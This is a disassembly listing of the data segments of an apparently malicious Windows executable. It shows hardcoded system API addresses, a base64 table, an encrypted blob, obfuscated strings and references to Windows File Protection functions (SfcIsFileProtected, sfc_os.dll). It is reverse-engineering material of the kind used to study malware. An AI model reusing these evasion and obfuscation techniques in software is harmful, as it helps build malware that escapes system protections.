align 10h
dword_446020 dd 40h dup(0) ; DATA XREF: sub_43B52C+8C�o
; sub_43C154+74�o ...
dword_446120 dd 77C724ACh ; DATA XREF: sub_43AA12+69�w
; sub_442C0A+127�r
align 10h
dword_446130 dd 0 ; DATA XREF: sub_43B780+3BB�r
; sub_43B780+3E3�w ...
dd 3E7h dup(0)
dword_4470D0 dd 771C6F69h ; DATA XREF: sub_43FEB1+3F�r
; sub_442386+82�w
dword_4470D4 dd 77E6869Bh ; DATA XREF: sub_43E8A2+107�r
; sub_440457+360�w
dword_4470D8 dd 771C16BAh ; DATA XREF: sub_442386+9E�w
dword_4470DC dd 77D4DC11h ; DATA XREF: sub_43EA51+20A�w
; sub_442C0A+154�r
dword_4470E0 dd 77E684C6h ; DATA XREF: sub_440457+14C�w
; sub_442E96+48B�r
align 10h
dword_4470F0 dd 41h dup(0) ; DATA XREF: sub_43AA99+25�o
; sub_43B260+1F�o ...
dword_4471F4 dd 73D9E660h ; DATA XREF: sub_43C38A+45B�r
; sub_43C38A+765�r ...
dword_4471F8 dd 77E7A5FDh ; DATA XREF: sub_43AA12+44�r
; sub_43AA12+63�r ...
align 10h
byte_447200 db 0 ; DATA XREF: sub_43B780+3D4�r
; sub_43B780+4EE�w ...
align 4
dd 0F9h dup(0)
dword_4475E8 dd 77E79F93h ; DATA XREF: sub_43AA12+D�r
; sub_43AD5A+D�r ...
dword_4475EC dd 77DD22EAh ; DATA XREF: sub_44015B+4A�w
; sub_440FBB+1D�r
dword_4475F0 dd 77D4456Bh ; DATA XREF: sub_43EA51+F2�w
dword_4475F4 dd 77E7513Ch ; DATA XREF: sub_43AFB5+120�r
; sub_440457+4B6�w
dword_4475F8 dd 77D49951h ; DATA XREF: sub_43EA51+27A�w
; sub_44108E+E29�r ...
dword_4475FC dd 77E704FCh ; DATA XREF: sub_43ADAC+17�r
; sub_43B182+18�r ...
dword_447600 dd 76C69891h ; DATA XREF: sub_4425F7+54�w
; sub_442A46+16F�r
dword_447604 dd 0 ; DATA XREF: sub_43C13D+3�o
; sub_43C13D+E�r ...
dword_447608 dd 77E78EAAh ; DATA XREF: sub_440457+2F0�w
; sub_4438E7+40�r ...
dword_44760C dd 100E0h ; DATA XREF: sub_442C0A+1D8�w
dword_447610 dd 0EA00h ; DATA XREF: sub_442A46:loc_442BE4�r
; sub_442C0A+1FE�w
dword_447614 dd 77D46F5Bh ; DATA XREF: sub_43EA51+82�w
; sub_440306+13�r
dword_447618 dd 77E79A45h ; DATA XREF: sub_43AA99+21E�r
; sub_43AA99+225�r ...
dword_44761C dd 0 ; DATA XREF: sub_43B52C+15F�w
; sub_43B52C+1D4�w ...
dword_447620 dd 771C1E56h ; DATA XREF: sub_43FEB1+58�r
; sub_442386+66�w
align 10h
dword_447630 dd 0 ; DATA XREF: sub_43E8A2+DF�w
; sub_43E8A2+12D�w ...
dd 0FEh dup(0)
dword_447A2C dd 73D9C489h ; DATA XREF: sub_442662+BA�w
dword_447A30 dd 0 ; DATA XREF: sub_43B52C+BA�w
dword_447A34 dd 77E79881h ; DATA XREF: sub_43AA99+D1�r
; sub_43AA99+E0�r ...
dword_447A38 dd 73D9C4C5h ; DATA XREF: sub_442662+9E�w
dword_447A3C dd 77E777EFh ; DATA XREF: sub_43A324+8�r
; sub_43AA82+8�r ...
dword_447A40 dd 77D48137h ; DATA XREF: sub_43A34D+70�r
; sub_43A34D+A5�r ...
dword_447A44 dd 77414CDCh ; DATA XREF: sub_43AD5A+4B�w
; sub_43BE25+21�r ...
align 10h
word_447A50 dw 0 ; DATA XREF: sub_43B780+51D�w
; sub_43B780+54C�r ...
align 4
dd 1F3h dup(0)
dword_448220 dd 77D47EE5h ; DATA XREF: sub_43EA51+19A�w
; sub_442C0A+108�r
dword_448224 dd 77D49A11h ; DATA XREF: sub_43A34D+535�r
; sub_43EA51+9E�w
dword_448228 dd 0 ; DATA XREF: sub_43B52C+AF�w
; sub_43D8A3:loc_43D91D�r
align 10h
dword_448230 dd 5 dup(0) ; DATA XREF: sub_43B52C+9F�o
; sub_43B780+18B�o ...
dword_448244 dd 77E805D8h ; DATA XREF: sub_43AA12+28�r
; sub_43AD5A+28�r ...
dword_448248 dd 77E7980Ah ; DATA XREF: sub_440457+1F4�w
; sub_441077+F�r
dword_44824C dd 73DA018Fh ; DATA XREF: sub_442662+19A�w
dword_448250 dd 77C7F85Ah ; DATA XREF: sub_43AA12+4A�w
; sub_44108E+77B�r ...
dword_448254 dd 77132EF6h ; DATA XREF: sub_43AED7+BD�w
; sub_43F0EA+42�r ...
dword_448258 dd 77E75D9Eh ; DATA XREF: sub_43DAAC+43�r
; sub_440457+2B8�w ...
dword_44825C dd 77E61608h ; DATA XREF: sub_43ED61+32�r
; sub_440457+264�w
dword_448260 dd 41h dup(0) ; DATA XREF: sub_43AA99:loc_43AAD1�o
; sub_43B260+13�o ...
dword_448364 dd 77E6BD13h ; DATA XREF: sub_43C38A+1384�r
; sub_440457+37C�w
dword_448368 dd 77D44200h ; DATA XREF: sub_43EA51+10E�w
; sub_442C0A+27B�r
align 10h
dword_448370 dd 0 ; DATA XREF: sub_43A34D+574�w
; sub_43FEB1+23�w ...
dword_448374 dd 0 ; DATA XREF: sub_43A34D+55A�r
; sub_44108E+475�w ...
dword_448378 dd 0 ; DATA XREF: sub_43A34D+127�r
; sub_43A34D+52E�r ...
dword_44837C dd 0 ; DATA XREF: sub_43A34D+631�r
; sub_44108E+833�w ...
dword_448380 dd 0 ; DATA XREF: sub_43A34D+53�r
; sub_43A34D+192�r ...
dword_448384 dd 0 ; DATA XREF: sub_43A34D+69�r
; sub_43A34D+88�r ...
dword_448388 dd 0 ; DATA XREF: sub_43A34D+9E�r
; sub_43A34D+2FA�r ...
dword_44838C dd 0 ; DATA XREF: sub_43A34D+E1�r
; sub_44108E+DB4�w ...
dword_448390 dd 0 ; DATA XREF: sub_43A34D+5AD�r
; sub_44108E+E07�w
dword_448394 dd 0 ; DATA XREF: sub_43A34D+5E4�r
; sub_44108E+E57�w
dword_448398 dd 0 ; DATA XREF: sub_43A34D+618�r
; sub_44108E+EA7�w
dword_44839C dd 0 ; DATA XREF: sub_43A34D+64C�r
; sub_44108E+EF7�w
dd 4A4h dup(0)
dword_449630 dd 77E79E34h ; DATA XREF: sub_440457+210�w
; sub_443565+1C�r
dword_449634 dd 73D9D340h ; DATA XREF: sub_43B3A7+B1�r
; sub_43C281+60�r ...
dword_449638 dd 77E7A099h ; DATA XREF: sub_440457+3D0�w
dword_44963C dd 0 ; DATA XREF: sub_43B52C+C5�w
; sub_443589+15F�r
dword_449640 dd 73D9D5E0h ; DATA XREF: sub_43B3A7+A3�r
; sub_43C38A+7D6�r ...
dword_449644 dd 77E8074Ah ; DATA XREF: sub_440457+3B4�w
; sub_4437B1+74�r
dword_449648 dd 77D414D4h ; DATA XREF: sub_43EA51+66�w
; sub_44108E+50A�r ...
dword_44964C dd 77F7E300h ; DATA XREF: sub_43EFD7+105�r
; sub_440C06+38E�w ...
dword_449650 dd 77E77963h ; DATA XREF: sub_43AA99+217�r
; sub_43ACC9+84�r ...
align 10h
dword_449660 dd 0 ; DATA XREF: sub_43B780+434�r
; sub_43B780+5CC�w ...
dd 3E7h dup(0)
dword_44A600 dd 73D9DBA2h ; DATA XREF: sub_442662+146�w
dword_44A604 dd 77D444F0h ; DATA XREF: sub_43EA51+25E�w
dword_44A608 dd 0 ; DATA XREF: sub_440457+1A0�w
dword_44A60C dd 77D5BA26h ; DATA XREF: sub_43A34D+5B4�r
; sub_43A34D+5EB�r ...
off_44A610 dd offset byte_41A00D ; DATA XREF: sub_442A46+1A4�r
; sub_442C0A+1F3�w
dword_44A614 dd 77E681EFh ; DATA XREF: sub_43AFB5+D4�r
; sub_43BFE5+6B�r ...
dword_44A618 dd 77DD189Ah ; DATA XREF: sub_44015B+85�w
; sub_440FBB+49�r
dword_44A61C dd 77E7C2C4h ; DATA XREF: sub_440457+398�w
; sub_442C0A+D8�r
dword_44A620 dd 77D4A102h ; DATA XREF: sub_43EA51+1B6�w
; sub_442C0A+118�r
dword_44A624 dd 77E793EFh ; DATA XREF: sub_43ACC9+4B�r
; sub_43C38A+63�r ...
dword_44A628 dd 77D43FEDh ; DATA XREF: sub_43EA51+146�w
; sub_44108E+DFB�r ...
dword_44A62C dd 0 ; DATA XREF: sub_43B52C+71�w
; sub_43F0EA+D73�r
dword_44A630 dd 73D92B86h ; DATA XREF: sub_43A34D+46C�r
; sub_43B4C6+55�r ...
dword_44A634 dd 73D9E5C5h ; DATA XREF: sub_43AFB5+5B�r
; sub_43AFB5+88�r ...
dword_44A638 dd 77D651AFh ; DATA XREF: sub_43EA51+2EA�w
; sub_43EEA0+23�r ...
dword_44A63C dd 77E77CCEh ; DATA XREF: sub_43D8A3+199�r
; sub_440457+184�w
dword_44A640 dd 77D6ADD7h ; DATA XREF: sub_43A34D+1DB�r
; sub_43A34D+28D�r ...
dword_44A644 dd 7720C039h ; DATA XREF: sub_43C0C2+12�r
; sub_43C0C2+32�r ...
dword_44A648 dd 73D9D320h ; DATA XREF: sub_43C281+E7�r
; sub_442662+D6�w
dword_44A64C dd 77E6C9E0h ; DATA XREF: sub_43E8A2+7E�r
; sub_440457+328�w
dword_44A650 dd 77D45F74h ; DATA XREF: sub_43EA51+162�w
; sub_44108E+4A5�r
dword_44A654 dd 77D5BB6Ch ; DATA XREF: sub_43A34D+4D0�r
; sub_43EA51+296�w
dword_44A658 dd 77D47D27h ; DATA XREF: sub_43A34D+561�r
; sub_43EA51+2B2�w ...
dword_44A65C dd 77F7E21Fh ; DATA XREF: sub_43EFD7+78�r
; sub_440C06+35E�w ...
dword_44A660 dd 77E73C49h ; DATA XREF: sub_440457+18�w
; sub_442652+9�r ...
dword_44A664 dd 77E6C0E3h ; DATA XREF: sub_43E8A2+A6�r
; sub_440457+30C�w ...
align 10h
dword_44A670 dd 40h dup(0) ; DATA XREF: sub_43B52C+D5�o
; sub_43B52C+229�o ...
dword_44A770 dd 77E7751Ah ; DATA XREF: sub_43B780:loc_43BB83�r
; sub_43B780:loc_43BD40�r ...
dword_44A774 dd 0 ; DATA XREF: sub_43B52C+87�w
; sub_44108E+37D�r
dword_44A778 dd 77E79424h ; DATA XREF: sub_43DAAC+103�r
; sub_440457+478�w
dword_44A77C dd 77D43DD3h ; DATA XREF: sub_43EA51+2CE�w
; sub_442C0A+24F�r
dword_44A780 dd 77E71702h ; DATA XREF: sub_43DAAC+BF�r
; sub_440457+45C�w
dword_44A784 dd 0 ; DATA XREF: sub_43AA82+3�o
; sub_43AA82+E�r ...
dword_44A788 dd 77E7A837h ; DATA XREF: sub_43AA99+7C�r
; sub_43ACC9+1D�r ...
align 10h
dword_44A790 dd 0 ; DATA XREF: sub_43E8A2:loc_43E8B2�w
; sub_43E8A2+58�r ...
dd 0FEh dup(0)
dword_44AB8C dd 77E79D8Ch ; DATA XREF: sub_43AA99+C4�r
; sub_43AA99+1E3�r ...
dword_44AB90 dd 77E7AC37h ; DATA XREF: sub_43B52C+108�r
; sub_43B52C+143�r ...
align 8
dword_44AB98 dd 77E7C657h ; DATA XREF: sub_43AFB5+22�r
; sub_440457+494�w
dword_44AB9C dd 77E78C81h ; DATA XREF: sub_43AA99+95�r
; sub_43ADAC+CB�r ...
dword_44ABA0 dd 771214E8h ; DATA XREF: sub_43AED7+66�w
; sub_43D8A3+1E4�r ...
dword_44ABA4 dd 77D5C13Ah ; DATA XREF: sub_43A34D+12E�r
; sub_43A34D+199�r ...
dword_44ABA8 dd 0 ; DATA XREF: sub_43A324+3�o
; sub_43A324+E�r ...
dword_44ABAC dd 73D9DBAFh ; DATA XREF: sub_43C38A+82E�r
; sub_43C38A+87E�r ...
dword_44ABB0 dd 7712151Dh ; DATA XREF: sub_43AED7+82�w
; sub_43B780+647�r
dword_44ABB4 dd 771C69DCh ; DATA XREF: sub_442386+4A�w
align 10h
dword_44ABC0 dd 77FC5460h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_43EFD7+13�o
; sub_43EFD7+73�o ...
_bss ends
; Section 6. (virtual address 0004B000)
; Virtual size : 00001C00 ( 7168.)
; Section size in file : 00001C00 ( 7168.)
; Offset to raw data for section: 0004B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 44B000h
off_44B000 dd offset sub_444B04 ; DATA XREF: .text:0043A1B5�r
dword_44B004 dd 0 ; DATA XREF: sub_43A1C3+4A�w
; sub_43A1C3+64�r
dword_44B008 dd 0 ; DATA XREF: sub_43A1C3+38�w
dword_44B00C dd 0 ; DATA XREF: sub_43A1C3+5F�w
; sub_43A1C3:loc_43A23C�r
dword_44B010 dd 0 ; DATA XREF: sub_43A25C+57�w
align 8
dd 7325h
aWr: ; DATA XREF: sub_43A1C3+3D�o
; sub_43A1C3+4F�o ...
unicode 0, <wr>,0
align 4
dd 4 dup(0)
dword_44B034 dd 0 ; DATA XREF: .text:0043A0F2�w
dword_44B038 dd 0 ; DATA XREF: .text:0043A0FC�w
; .text:0043A117�r ...
dword_44B03C dd 0 ; DATA XREF: .text:0043A104�w
dword_44B040 dd 14h dup(0) ; DATA XREF: .text:0043A111�o
; .text:0043A11F�o
word_44B090 dw 1 ; DATA XREF: sub_43AA99+C�r
; sub_43B780+74�r ...
align 4
dword_44B094 dd 6 ; DATA XREF: sub_43B780+1A6�r
; sub_43DAAC+84�r ...
dword_44B098 dd 7 ; DATA XREF: sub_43B4C6+43�r
; sub_43B780+44D�r ...
dword_44B09C dd 8 ; DATA XREF: sub_43A34D+14C�r
; sub_43A34D+31C�r ...
dword_44B0A0 dd 4 ; DATA XREF: sub_43B780+104�r
; sub_43BFE5+CF�r ...
dword_44B0A4 dd 2 ; DATA XREF: sub_43A34D+1BC�r
; sub_43B52C+187�r ...
dword_44B0A8 dd 3 ; DATA XREF: sub_43B780+2CC�r
; sub_43C281+91�r ...
dword_44B0AC dd 3 ; DATA XREF: sub_43A34D+255�r
; sub_43B52C+E7�r ...
word_44B0B0 dw 8 ; DATA XREF: sub_43ADAC+B4�r
; sub_43ADAC+DA�r ...
align 4
dword_44B0B4 dd 8 ; DATA XREF: sub_43AA99+EF�r
; sub_43B52C+1CC�r ...
dword_44B0B8 dd 4 ; DATA XREF: sub_43B52C+1A3�r
; sub_43BFE5:loc_43C0AF�r ...
word_44B0BC dw 9 ; DATA XREF: sub_43B52C+164�r
; sub_43C281+A9�r ...
align 10h
dword_44B0C0 dd 1 ; DATA XREF: sub_43AA99+184�r
; sub_43B182+7C�r ...
dword_44B0C4 dd 4 ; DATA XREF: sub_43A34D+359�r
; sub_43ADAC+103�r ...
word_44B0C8 dw 7 ; DATA XREF: sub_43A34D+426�r
; sub_43A34D:loc_43A7AC�r ...
align 4
dword_44B0CC dd 1 ; DATA XREF: sub_43A34D:loc_43A418�r
; sub_43AA99+126�r ...
word_44B0D0 dw 0 ; DATA XREF: sub_43B3A7+4E�r
; sub_43B780+19F�r ...
align 4
dword_44B0D4 dd 1 ; DATA XREF: sub_43A34D+3B3�r
; sub_43B3A7+E7�r ...
word_44B0D8 dw 5 ; DATA XREF: sub_43A34D+B9�r
; sub_43A34D+3AC�r ...
align 4
word_44B0DC dw 6 ; DATA XREF: sub_43B780+9A�r
; sub_43B780+FD�r ...
align 10h
word_44B0E0 dw 0 ; DATA XREF: sub_43AA99+61�r
; sub_43AA99+E8�r ...
align 4
dword_44B0E4 dd 2 ; DATA XREF: sub_43A34D+268�r
; sub_43ADAC+79�r ...
word_44B0E8 dw 5 ; DATA XREF: sub_43B52C+134�r
; sub_43E40A+AD�r ...
align 4
dword_44B0EC dd 5 ; DATA XREF: sub_43A34D+152�r
; sub_43B3A7+75�r ...
dword_44B0F0 dd 4 ; DATA XREF: sub_43A34D+35E�r
; sub_43B52C+4E�r ...
word_44B0F4 dw 9 ; DATA XREF: sub_43B780+24F�r
; sub_43C38A+1068�r ...
align 4
dword_44B0F8 dd 2 ; DATA XREF: sub_43ACC9+33�r
; sub_43B333+4A�r ...
dword_44B0FC dd 7 ; DATA XREF: sub_43AA99+1D2�r
; sub_43B780:loc_43BD15�r ...
word_44B100 dw 9 ; DATA XREF: sub_43A34D:loc_43A43B�r
; sub_43A34D+345�r ...
align 4
dword_44B104 dd 3 ; DATA XREF: sub_43B3A7+E2�r
; sub_43B3A7+10B�r ...
dword_44B108 dd 0 ; DATA XREF: sub_43C38A+183�r
; sub_43C38A+601�r ...
dword_44B10C dd 7 ; DATA XREF: sub_43B52C+236�r
; sub_43BE80+95�r ...
word_44B110 dw 4 ; DATA XREF: sub_43C38A+EED�r
; sub_43C38A+F01�r ...
align 4
word_44B114 dw 2 ; DATA XREF: sub_43C38A+8B9�r
; sub_43C38A+10BA�r ...
align 4
dword_44B118 dd 1 ; DATA XREF: sub_43B3A7+55�r
; sub_43B780+326�r ...
dword_44B11C dd 3 ; DATA XREF: sub_43C38A+981�r
; sub_43C38A+A44�r ...
dword_44B120 dd 2 ; DATA XREF: sub_43A9C0+3F�r
; sub_43C38A+EDF�r ...
dword_44B124 dd 1 ; DATA XREF: sub_43A34D:loc_43A8C9�r
; sub_43AA99+68�r ...
word_44B128 dw 0 ; DATA XREF: sub_43B52C+16B�r
; sub_43C38A+46B�r ...
align 4
dword_44B12C dd 5 ; DATA XREF: sub_43A34D+3B�r
; sub_43AA99+163�r ...
dword_44B130 dd 0 ; DATA XREF: sub_43ADAC+113�r
; sub_43B3A7+92�r ...
dword_44B134 dd 3 ; DATA XREF: sub_43B3A7:loc_43B4A4�r
; sub_43C38A+337�r ...
dword_44B138 dd 8 ; DATA XREF: sub_43A9C0+3A�r
; sub_43C38A+CDF�r ...
dword_44B13C dd 2 ; DATA XREF: sub_43A34D:loc_43A9A9�r
; sub_43BE80+25�r ...
dword_44B140 dd 8 ; DATA XREF: sub_43B3A7+65�r
; sub_43C281+F0�r ...
dword_44B144 dd 5 ; DATA XREF: sub_43B3A7+102�r
; sub_43BF3D+29�r ...
word_44B148 dw 3 ; DATA XREF: sub_43B52C+26�r
; sub_43B780+509�r ...
align 4
dword_44B14C dd 6 ; DATA XREF: sub_43B3A7+C4�r
; sub_43B780+320�r ...
word_44B150 dw 5 ; DATA XREF: sub_43C38A+A5D�r
; sub_43C38A+100E�r ...
align 4
word_44B154 dw 8 ; DATA XREF: sub_43A9C0+19�r
; sub_43AA99+16D�r ...
align 4
dword_44B158 dd 0 ; DATA XREF: sub_43B260+8E�r
; sub_43B780+26D�r ...
dword_44B15C dd 4 ; DATA XREF: sub_43C38A+8EA�r
; sub_43DEF2+54�r ...
dword_44B160 dd 8 ; DATA XREF: sub_43ADAC+87�r
; sub_43ADAC+A9�r ...
dword_44B164 dd 0 ; DATA XREF: sub_43B52C+1E0�r
; sub_43C38A+28�r ...
word_44B168 dw 8 ; DATA XREF: sub_43AA99+1FB�r
; sub_43B333+41�r ...
align 4
word_44B16C dw 4 ; DATA XREF: sub_43A34D+1B5�r
; sub_43AA99+AC�r ...
align 10h
word_44B170 dw 8 ; DATA XREF: sub_43B4C6+48�r
; sub_43B52C:loc_43B705�r ...
align 4
dword_44B174 dd 9 ; DATA XREF: sub_43A34D+492�r
; sub_43AA99+1BB�r ...
dword_44B178 dd 3 ; DATA XREF: sub_43B260+B0�r
; sub_43BFE5+26�r ...
dword_44B17C dd 6 ; DATA XREF: sub_43A34D+1C9�r
; sub_43B3A7:loc_43B417�r ...
word_44B180 dw 6 ; DATA XREF: sub_43C281+99�r
; sub_43C38A+E7�r ...
align 4
dword_44B184 dd 6 ; DATA XREF: sub_43AA99+12D�r
; sub_43B3A7+C9�r ...
dword_44B188 dd 0 ; DATA XREF: sub_43A34D+30E�r
; sub_43B3A7+44�r ...
dword_44B18C dd 1 ; DATA XREF: sub_43A34D+275�r
; sub_43A34D+48C�r ...
dword_44B190 dd 3 ; DATA XREF: sub_43AFB5+19A�r
; sub_43C154+89�r ...
word_44B194 dw 0 ; DATA XREF: sub_43A34D:loc_43A449�r
; sub_43A34D+307�r ...
align 4
dword_44B198 dd 8 ; DATA XREF: sub_43A34D+19F�r
; sub_43B52C+11C�r ...
word_44B19C dw 6 ; DATA XREF: sub_43B780+525�r
; sub_43C38A+123E�r ...
align 10h
dword_44B1A0 dd 6 ; DATA XREF: sub_43AFB5+A6�r
; sub_43BE80:loc_43BED3�r ...
dword_44B1A4 dd 0 ; DATA XREF: sub_43B52C+1AC�r
; sub_43BE80+48�r ...
word_44B1A8 dw 0 ; DATA XREF: sub_43A34D+1A4�r
; sub_43C38A:loc_43CE1B�r ...
align 4
dword_44B1AC dd 4 ; DATA XREF: sub_43A34D:loc_43A3FE�r
; sub_43AA99+13�r ...
dword_44B1B0 dd 0 ; DATA XREF: sub_43A34D+141�r
; sub_43B780:loc_43BB71�r ...
dword_44B1B4 dd 1 ; DATA XREF: sub_43B333+2F�r
; sub_43C38A+1DC�r ...
dword_44B1B8 dd 3 ; DATA XREF: sub_43A34D+134�r
; sub_43A34D+33F�r ...
word_44B1BC dw 6 ; DATA XREF: sub_43AA99+B3�r
; sub_43B52C+1FE�r ...
align 10h
dword_44B1C0 dd 3 ; DATA XREF: sub_43A34D+146�r
; sub_43A9C0+29�r ...
dword_44B1C4 dd 5 ; DATA XREF: sub_43ADAC+11B�r
; sub_43C38A+1B4�r ...
dword_44B1C8 dd 2 ; DATA XREF: sub_43A34D+27A�r
; sub_43AA99+4B�r ...
dword_44B1CC dd 4 ; DATA XREF: sub_43A34D+25A�r
; sub_43B52C+205�r ...
dword_44B1D0 dd 1 ; DATA XREF: sub_43EFD7+A�r
; sub_43EFD7+1E�w ...
dword_44B1D4 dd 77E60000h ; DATA XREF: sub_440457+C�r
; sub_440457+28�r ...
dword_44B1D8 dd 73D90000h ; DATA XREF: sub_442662+13�w
; sub_442662+2E�w ...
dword_44B1DC dd 77D40000h ; DATA XREF: sub_43EA51+13�w
; sub_43EA51+2E�w ...
dword_44B1E0 dd 77C70000h ; DATA XREF: sub_43AA12+13�w
; sub_43AA12+2E�w ...
dword_44B1E4 dd 771B0000h ; DATA XREF: sub_442386+13�w
; sub_442386+2E�w ...
dword_44B1E8 dd 77120000h ; DATA XREF: sub_43AED7+13�w
; sub_43AED7+2E�w ...
dword_44B1EC dd 76BB0000h ; DATA XREF: sub_4425F7+13�w
; sub_4425F7+2E�w ...
dword_44B1F0 dd 76C60000h ; DATA XREF: sub_442822+13�w
; sub_442822+2E�w ...
dword_44B1F4 dd 773D0000h ; DATA XREF: sub_43AD5A+13�w
; sub_43AD5A+2E�w ...
dword_44B1F8 dd 77DD0000h ; DATA XREF: sub_44015B+13�w
; sub_44015B+2E�w ...
off_44B1FC dd offset aAbcdefghijklmn ; DATA XREF: sub_43BE80:loc_43BEF9�r
; "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm"...
dword_44B200 dd 0E860h, 0E9610000h, 2 dup(0) ; DATA XREF: sub_43C38A+945�o
dword_44B210 dd 11h, 0Fh dup(0) ; DATA XREF: sub_43AF9B+8�o
dword_44B250 dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
; DATA XREF: sub_43AF9B+3�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh
dword_44B290 dd 0 ; DATA XREF: sub_441FCC:loc_4420B4�r
; sub_441FCC+342�w ...
off_44B294 dd offset sub_4400E0 ; DATA XREF: sub_43B780+5D3�o
dd offset sub_43AA82
dd offset sub_43DDA6
dd offset sub_441018
dd offset sub_43DAA4
dd offset sub_4402FE
dd offset sub_43E40A
dword_44B2B0 dd 0 ; DATA XREF: sub_43B52C+DB�w
; sub_43D8A3+103�r ...
off_44B2B4 dd offset sub_43C0C2 ; DATA XREF: .data:off_44B2D0�o
dd offset sub_43A324
dd offset sub_44020A
dd offset sub_4424B9
dd offset sub_43B17A
dd offset sub_43EA49
dd offset sub_4425A3
off_44B2D0 dd offset off_44B2B4 ; DATA XREF: sub_43FEB1+137�o
; sub_440324+B0�o
dword_44B2D4 dd 0 ; DATA XREF: sub_43FEB1+45�o
; sub_43FEB1+7F�r ...
off_44B2D8 dd offset sub_44386C ; DATA XREF: .data:off_44B2F4�o
dd offset sub_43C13D
dd offset sub_43D874
dd offset sub_44355D
dd offset sub_43B778
dd offset sub_43EE98
dd offset sub_440324
off_44B2F4 dd offset off_44B2D8 ; DATA XREF: sub_43FEB1:loc_440073�o
aCreatethread db 'CreateThread',0 ; DATA XREF: sub_440C06+2EC�o
aEntercriticals db 'EnterCriticalSection',0 ; DATA XREF: sub_440C06+2FF�o
aInitializecrit db 'InitializeCriticalSection',0 ; DATA XREF: sub_440C06+312�o
aLeavecriticals db 'LeaveCriticalSection',0 ; DATA XREF: sub_440C06+326�o
align 4
dword_44B34C dd 0FFFFFFFFh ; DATA XREF: sub_44335A+34�r
dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
off_44B74C dd offset loc_4433C8 ; DATA XREF: sub_44335A+67�r
dd offset loc_4433D0
dd offset loc_443413
dd offset loc_443451
dword_44B75C dd 0DAF40004h, 87989Ah ; DATA XREF: sub_443C06+55�o
dword_44B764 dd 2B770001h ; DATA XREF: sub_443C06+29�o
db 0
aSS_0 db '%s%s\',0 ; DATA XREF: sub_4438E7+28B�o
; sub_4438E7+2EF�o
byte_44B76F db 0 ; DATA XREF: sub_4438E7+A8�o
dd 73254100h
db 2Ah, 0
word_44B776 dw 4 ; DATA XREF: sub_4438E7+63�o
dd 0FFA6E0C5h
db 99h, 0
word_44B77E dw 0 ; DATA XREF: sub_4437B1+31�o
a5kkqVx db '5kkq-vx',0
dword_44B788 dd 25C10000h, 746D5F73h, 752578h ; DATA XREF: sub_4437B1:loc_4437D2�o
dword_44B794 dd 4, 6D002Fh, 6B0060h, 76h ; DATA XREF: sub_443589+27�o
dword_44B7A4 dd 79570004h, 233633h ; DATA XREF: sub_442E96+40D�o
dword_44B7AC dd 6BA70000h, 762D716Bh ; DATA XREF: sub_442C0A+16A�o
db 78h, 0
word_44B7B6 dw 0 ; DATA XREF: sub_442C0A+15A�o
aKkqVx_1 db 'kkq-vx',0
dword_44B7C0 dd 6BFD0000h, 762D716Bh ; DATA XREF: sub_442C0A+E8�o
db 78h, 0
word_44B7CA dw 0 ; DATA XREF: sub_442C0A+9B�o
aUkkqVx db 'kkq-vx',0
dword_44B7D4 dd 256C0000h, 746D5F73h, 752578h ; DATA XREF: sub_442C0A:loc_442C95�o
dword_44B7E0 dd 1F6C000Ah, 3330F0Ah, 8421Fh ; DATA XREF: sub_442822+1C�o
db 2 dup(0)
word_44B7EE dw 0 ; DATA XREF: sub_442822+1�o
aSfc_os_dll db 1Bh,'sfc_os.dll',0
dword_44B7FC dd 737F0000h, 70637274h ; DATA XREF: sub_442662+19F�o
db 79h, 0
word_44B806 dw 0 ; DATA XREF: sub_442662+183�o
aOvsprintf db 'vsprintf',0
word_44B812 dw 0 ; DATA XREF: sub_442662+167�o
dd 727073F9h, 66746E69h
db 0
byte_44B81D db 2 dup(0), 0D1h ; DATA XREF: sub_442662+14B�o
aStrcat db 'strcat',0
byte_44B827 db 0 ; DATA XREF: sub_442662+12F�o
dd 72737A00h, 646E61h
dword_44B830 dd 72EA0000h, 646E61h ; DATA XREF: sub_442662+113�o
dword_44B838 dd 6DDE0000h, 65736D65h ; DATA XREF: sub_442662+F7�o
db 74h, 0
word_44B842 dw 0 ; DATA XREF: sub_442662+DB�o
aMemcpy db 'memcpy',0
dword_44B84C dd 6D970000h, 6D636D65h ; DATA XREF: sub_442662+BF�o
db 70h, 0
word_44B856 dw 0 ; DATA XREF: sub_442662+A3�o
aMalloc db 'malloc',0
dword_44B860 dd 66E20000h, 656572h ; DATA XREF: sub_442662+87�o
dword_44B868 dd 61100000h, 696F74h ; DATA XREF: sub_442662+6B�o
dword_44B870 dd 744C0000h, 7070756Fh ; DATA XREF: sub_442662+4F�o
db 65h, 72h, 0
byte_44B87B db 0 ; DATA XREF: sub_442662:loc_442695�o
dd 735F6E00h, 7065656Ch
db 0
byte_44B885 db 2 dup(0), 0A3h ; DATA XREF: sub_442662+1C�o
aCrtdll_dll db 'crtdll.dll',0
byte_44B893 db 0 ; DATA XREF: sub_442662+1�o
dd 72632200h, 6C6C6474h, 6C6C642Eh
db 0
byte_44B8A1 db 2 dup(0), 81h ; DATA XREF: sub_4425F7+3C�o
aSfcisfileprote db 'SfcIsFileProtected',0
byte_44B8B7 db 0 ; DATA XREF: sub_4425F7+1C�o
dd 6673AD00h, 6C642E63h
db 6Ch, 0
word_44B8C2 dw 0 ; DATA XREF: sub_4425F7+1�o
aSfc_dll db '^sfc.dll',0
byte_44B8CD db 2 dup(0), 0D0h ; DATA XREF: sub_442386+A3�o
